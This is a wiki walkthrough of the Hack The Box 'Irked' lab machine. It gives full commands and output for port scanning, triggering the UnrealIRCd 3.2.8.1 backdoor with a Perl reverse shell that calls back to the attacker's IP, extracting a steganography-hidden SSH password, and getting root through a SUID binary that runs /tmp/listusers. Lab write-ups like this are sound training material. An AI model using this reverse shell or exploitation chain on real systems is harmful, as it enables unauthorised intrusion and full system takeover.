Irked

From Luniwiki
Jump to: navigation, search

Back

Irked01.png

Ports scan

u505@kali:~/HTB/Machines/Irked$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.117 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-14 19:56:36 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 33523/tcp on 10.10.10.117 Discovered open port 111/tcp on 10.10.10.117 Discovered open port 6697/tcp on 10.10.10.117 Discovered open port 65534/tcp on 10.10.10.117 Discovered open port 80/tcp on 10.10.10.117 Discovered open port 22/tcp on 10.10.10.117 Discovered open port 8067/tcp on 10.10.10.117
u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:56 EST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.039s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33523/tcp   status
|   100024  1          33735/udp   status
|   100024  1          35313/tcp6  status
|_  100024  1          41089/udp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds

We run a new nmap with all ports found by masscan

u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV -p 22,80,111,6697,8067,50675,65534 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:59 EST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.039s latency).

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 33523/tcp status | 100024 1 33735/udp status | 100024 1 35313/tcp6 status |_ 100024 1 41089/udp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 50675/tcp closed unknown 65534/tcp open irc UnrealIRCd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.06 seconds

Web enumeration

Irked02.png

The page has a smiley.

u505@kali:~/HTB/Machines/Irked$ curl http://irked
<img src=irked.jpg>
 <br>
 <b><center>IRC is almost working!</b></center>
u505@kali:~/HTB/Machines/Irked$ wget -q http://irked/irked.jpg

The web crawling doesn't give us any hint.

u505@kali:~/HTB/Machines/Irked$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://10.10.10.117 --plain-text-report=dirsearch.txt

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221
Error Log: /opt/utils/dirsearch/logs/errors-20-02-14_15-07-55.log
Target: http://10.10.10.117
[15:07:55] Starting: [15:07:56] 403 - 300B - /.htpasswd.txt [15:08:07] 403 - 293B - /icons/ [15:08:10] 200 - 626B - /manual/ [15:08:17] 403 - 301B - /server-status/
Task Completed

Port 6697

In the port 6697, there is an IRC server.

u505@kali:~/HTB/Machines/Irked$ irssi
/connect 10.10.10.117 6697
  Irssi v1.2.2-1+b1 - https://irssi.org
15:12 -!-  ___           _
15:12 -!- |_ _|_ _ _____(_)
15:12 -!-  | || '_(_-<_-< |
15:12 -!- |___|_| /__/__/_|
15:12 -!- Irssi v1.2.2-1+b1 - https://irssi.org
15:13 -!- Irssi: Looking up 10.10.10.117
15:13 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 6697
15:13 -!- Irssi: Connection to 10.10.10.117 established
15:13 !irked.htb *** Looking up your hostname...
15:13 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
15:13 -!- You have not registered
15:13 -!- Welcome to the ROXnet IRC Network u505!u505@10.10.14.26
15:13 -!- Your host is irked.htb, running version Unreal3.2.8.1
15:13 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
15:13 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
15:13 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307
          MAXTARGETS=20 are supported by this server
15:13 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet
          CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
15:13 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
15:13 -!- There are 1 users and 0 invisible on 1 servers
15:13 -!- 1 unknown connection(s)
15:13 -!- I have 1 clients and 0 servers
15:13 -!- Current Local Users: 1  Max: 1
15:13 -!- Current Global Users: 1  Max: 1
15:13 -!- MOTD File is missing
15:13 -!- Mode change [+iwx] for user u505
/quit

The version is Unreal 3.2.8.1

u505@kali:~/HTB/Machines/Irked$ searchsploit Unreal 3.2.8.1
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                        | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                             | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                      | exploits/linux/remote/13853.pl
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Taking a look at metasploit script, we see that the backdoor allows to execute code after the characters AB;

Exploit IRC backdoor

Raise listener

u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Call the backdoor

u505@kali:~/HTB/Machines/Irked$ telnet 10.10.10.117 6697
Trying 10.10.10.117...
Connected to 10.10.10.117.
Escape character is '^]'.
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; perl -e 'use Socket;$i="10.10.14.26";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And the listener opens the reverse shell

u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.117.
Ncat: Connection from 10.10.10.117:36220.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
ircd
$ python -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ stty raw -echo
stty raw -echo

User flag

ircd@irked:~$ cat .bash_history
...
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

We will take a look to the folder Documents

ircd@irked:~$ cd /home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

We cannot catch the flag, but the hidden file .backup is readable.

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Because of the word steg, I guess the password is some information hidden by steganography. I guess the image is the irked.jpg file on the web server.

u505@kali:~/HTB/Machines/Irked$ steghide info  irked.jpg
"irked.jpg":
 format: jpeg
 capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
 embedded file "pass.txt":
   size: 17.0 Byte
   encrypted: rijndael-128, cbc
   compressed: yes
u505@kali:~/HTB/Machines/Irked$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
u505@kali:~/HTB/Machines/Irked$ cat pass.txt
Kab6h+m+bbp2J:HG

Now we can ssh the box

u505@kali:~/HTB/Machines/Irked$ ssh djmardov@irked
The authenticity of host 'irked (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'irked,10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@irked's password:

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 15 08:56:32 2018 from 10.33.3.3 djmardov@irked:~$ cat Documents/user.txt <USER_FLAG>

Enumeration

u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/pspy/pspy32 ./
505@kali:~/HTB/Machines/Irked/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target we download the files

djmardov@irked:~$ wget -q http://10.10.14.26/LinEnum.sh
djmardov@irked:~$ wget -q http://10.10.14.26/pspy32
djmardov@irked:~$ chmod +x LinEnum.sh pspy32

During the enumeration a strange file appears with suid

[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

viewuser file

The execution of the file give this result

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: not found

Pspy snoops the folowing

2020/02/14 15:55:08 CMD: UID=1000 PID=1961   | -bash
2020/02/14 15:55:08 CMD: UID=1000 PID=1962   | sh -c who
2020/02/14 15:55:08 CMD: UID=1000 PID=1963   | sh -c who
2020/02/14 15:55:08 CMD: UID=1000 PID=1964   | /usr/bin/viewuser
2020/02/14 15:55:08 CMD: UID=1000 PID=1965   | sh -c /tmp/listusers

I try to write something on the missing file

djmardov@irked:~$ echo "whoami" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: Permission denied

We fix the perms to the file

djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
root

We are root! Instead of whoami, we will launch a new bash

djmardov@irked:~$ echo "bash" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
root@irked:~# whoami
root

Instead of test and try, a more scientific and quieter method would be to transfer the file and decompile it.

Irked03.png

Now, it was clear that the program does a setuid and execute the file /tmp/listusers

Root Flag

root@irked:~# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 18:54, 14 February 2020 (EST)